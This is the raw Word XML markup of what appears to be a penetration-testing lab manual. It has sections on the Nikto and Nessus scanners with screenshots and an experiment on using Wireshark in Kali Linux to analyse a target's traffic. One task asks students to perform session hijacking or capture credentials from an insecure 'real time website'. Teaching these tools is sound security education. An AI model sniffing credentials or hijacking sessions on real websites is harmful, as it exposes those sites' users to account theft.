          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D19E25" w14:textId="77777777" w:rsidR="00250D34" w:rsidRPr="001C411D" w:rsidRDefault="00250D34" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BAC9E05" w14:textId="77777777" w:rsidR="00250D34" w:rsidRPr="001C411D" w:rsidRDefault="00250D34" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="583728F1" w14:textId="77777777" w:rsidR="00250D34" w:rsidRPr="001C411D" w:rsidRDefault="00250D34" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77BC3ED9" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00A9035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0BC40E8F" w14:textId="77777777"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1A521721" w14:textId="77777777" w:rsidR="009111A4" w:rsidRPr="001C411D" w:rsidRDefault="009111A4" w:rsidP="009111A4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D23994D" w14:textId="5CF4118C" w:rsidR="009111A4" w:rsidRPr="001C411D" w:rsidRDefault="009111A4" w:rsidP="009111A4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09BD0FF8" wp14:editId="142B51F6">
            <wp:extent cx="4993341" cy="346717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98">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4996040" cy="3469045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D134867" wp14:editId="3124A86F">
            <wp:extent cx="5038165" cy="3286434"/>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99">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5047628" cy="3292607"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DDB1588" wp14:editId="7AC15D36">
            <wp:extent cx="5208494" cy="3696696"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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211231" cy="3698639"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D8C4449" wp14:editId="252C2B8D">
            <wp:extent cx="5208270" cy="378733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1">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5213363" cy="3791033"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4082ADCD" w14:textId="068B7179" w:rsidR="009111A4" w:rsidRPr="001C411D" w:rsidRDefault="009111A4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6F4402" w14:textId="0B57C08E" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="009111A4" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Nessus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A49A5CF" w14:textId="77777777" w:rsidR="001F1D48" w:rsidRPr="001C411D" w:rsidRDefault="001F1D48" w:rsidP="001F1D48">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="466A9AD7" wp14:editId="02C2FD21">
            <wp:extent cx="5943600" cy="322135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r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D75985C" wp14:editId="7362ABD5">
            <wp:extent cx="5943600" cy="34505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r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B66F3E1" wp14:editId="27A6CEFD">
            <wp:extent cx="5943600" cy="3488055"/>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r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="455F87FE" wp14:editId="7CF0EB12">
            <wp:extent cx="5943600" cy="3420110"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>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76910C8A" w14:textId="77777777" w:rsidR="00250D34" w:rsidRPr="001C411D" w:rsidRDefault="00250D34" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="359B083D" w14:textId="77777777" w:rsidR="00250D34" w:rsidRPr="001C411D" w:rsidRDefault="00250D34" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1797DA9D" w14:textId="77777777" w:rsidR="00250D34" w:rsidRPr="001C411D" w:rsidRDefault="00250D34" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37AA7355" w14:textId="77777777" w:rsidR="00250D34" w:rsidRPr="001C411D" w:rsidRDefault="00250D34" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="700311D3" w14:textId="48197120" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00250D34" w:rsidP="00EF04B3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EXPERIMENT NO.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A513C" w:rsidRPr="001C411D" w14:paraId="2B4A3D52" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A1B8701"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7E876568"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3AE1E826" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D16EC2E"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7A1CB893"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6A4AD2A2" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="536F911A"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4A4593FB"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38BAA2E6" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B326E34" w14:textId="7ED35FAB"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BA513C" w:rsidRPr="001C411D" w14:paraId="144F5155" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E0A158A"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6E537F80"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r w:rsidR="00BA513C" w:rsidRPr="001C411D" w14:paraId="74E9DA35" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33E910B2" w14:textId="77777777" w:rsidR="00BA513C" w:rsidRPr="001C411D" w:rsidRDefault="00BA513C" w:rsidP="00BA513C">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46F9B6E2" w14:textId="77777777" w:rsidR="00BA513C" w:rsidRPr="001C411D" w:rsidRDefault="00BA513C" w:rsidP="00BA513C">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A6528DA" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00EF04B3">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04B3" w:rsidRPr="001C411D" w14:paraId="34F15CF4" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25DD07F1"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2B866CBD" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5F064D60" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>To familiarize the students with the concept of Second phase of penetration testing</w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FD336FE" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF04B3" w:rsidRPr="001C411D" w14:paraId="7A618A1B" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="2A87DCB3"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392A939F" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="316E1760" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="743" w:hanging="284"/>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gather the information of the network by analyzing the traffic moving in and out from target machine</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="678384D4" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="99"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>The students will understand Wireshark inbuilt Tool of Kali Linux</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B8BB9BE"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1C33C93B" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AFC3715"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08D9CB1E" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2651F100" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>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Install Wireshark on any network and apply filters to gather different information of the target machine</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30976232" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>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 xml:space="preserve">Perform Session hijacking/ find credentials of unsecure real time website using Wireshark </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A9EDFCC" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7BFC6175"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0A0C9E21" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09BB9C80"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7D6F9996" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3D640D72"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orld’s foremost and widely-used network protocol </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>analyzer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4264B54A"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Tells what’s happening on your network at a microscopic level</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C8BC0C9"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Standard across many commercial and non-profit enterprises, government agencies, and educational institutions. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="086F9DE3"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val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>got famous in black hat.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D08D027"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observes the messages exchanged.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="162634F9" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="720"/>
              </w:tabs>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">Passive and Preinstalled in Kali Linux, for windows </w:t>
            </w:r>
            <w:hyperlink r:id="rId106" w:history="1">
              <w:r w:rsidRPr="001C411D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
                </w:rPr>
                <w:t>http://www.wireshark.org</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52CAEEE6" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00DE6919">
